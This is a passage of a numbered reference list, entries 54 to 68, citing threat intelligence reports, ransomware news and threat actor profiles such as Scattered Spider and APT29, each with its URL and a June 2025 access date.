  54. 2022 Global Threat Intelligence Report – NTT Data, accessed June 24, 2025, https://us.nttdata.com/en/-/media/nttdataamerica/files/gated-asset/2022-global-threat-intelligence-report.pdf
  55. Dina Temple-Raston | 90.3 KAZU, accessed June 24, 2025, https://www.kazu.org/people/dina-temple-raston
  56. Colonial Pipeline Shutdown Is The Latest In Wave Of Cyber Attacks | 90.3 KAZU, accessed June 24, 2025, https://www.kazu.org/npr-news/2021-05-12/colonial-pipeline-shutdown-is-the-latest-in-wave-of-cyber-attacks
  57. Decomposing a Threat | Red Team Development and Operations – RedTeam.Guide, accessed June 24, 2025, https://redteam.guide/docs/Exercises/threat-profile/
  58. Justice Department charges 2 Russians with operating cybercrime group using ransomware, accessed June 24, 2025, https://www.cbsnews.com/news/justice-department-charges-russian-men-cybercrime-ransomware/
  59. Norton Secure VPN (1 year, 1 device) | HACKED BY KEDIRISECTEAM, accessed June 24, 2025, https://umuriakudus.onthehub.com/WebStore/OfferingDetails.aspx?o=3c5b4909-cb9c-e811-8109-000d3af41938
  60. Cyber Security on the Dark Web: Motives, Deception, and Illegal Services | TikTok, accessed June 24, 2025, https://www.tiktok.com/@tekdotid/video/7390973426875239686
  61. Octo Tempest Threat Actor Profile – CyberWire, accessed June 24, 2025, https://thecyberwire.com/podcasts/microsoft-threat-intelligence/5/notes
  62. hc3 tlp clear threat actor profile scattered spider-10-24-2024.pdf – American Hospital Association, accessed June 24, 2025, https://www.aha.org/system/files/media/file/2024/10/hc3%20tlp%20clear%20threat%20actor%20profile%20scattered%20spider-10-24-2024.pdf
  63. Microsoft, CrowdStrike, other cyber firms collaborate on threat actor taxonomy, accessed June 24, 2025, https://www.cybersecuritydive.com/news/microsoft-crowdstrike-other-cyber-firms-collaborate-on-threat-actor-taxon/749614/
  64. Threat Actor Profile – Cybanetix, accessed June 24, 2025, https://cybanetix.com/wp-content/uploads/2025/05/Scattered-Spider-Threat-Actor-Profile.pdf
  65. Threat Actor Profiles – SOCRadar® Cyber Intelligence Inc., accessed June 24, 2025, https://socradar.io/category/threat-actor-profiles/
  66. XRY — Mobile Data Forensic Phone Extraction & Recovery – MSAB, accessed June 24, 2025, https://www.msab.com/product/xry-extract/
  67. Cyber Crime & Cyber Terrorism (RRPHE RENTAL Edition): University of Detroit Mercy, accessed June 24, 2025, https://www.bkstr.com/udmercystore/product/cyber-crime---cyber-terrorism--rrphe-rental-edition--369414-1
  68. THREAT PROFILE: APT29 – Blackpoint Cyber, accessed June 24, 2025, https://blackpointcyber.com/wp-content/uploads/2024/06/Threat-Profile-APT29_Blackpoint-Adversary-Pursuit-Group-APG_2024.pdf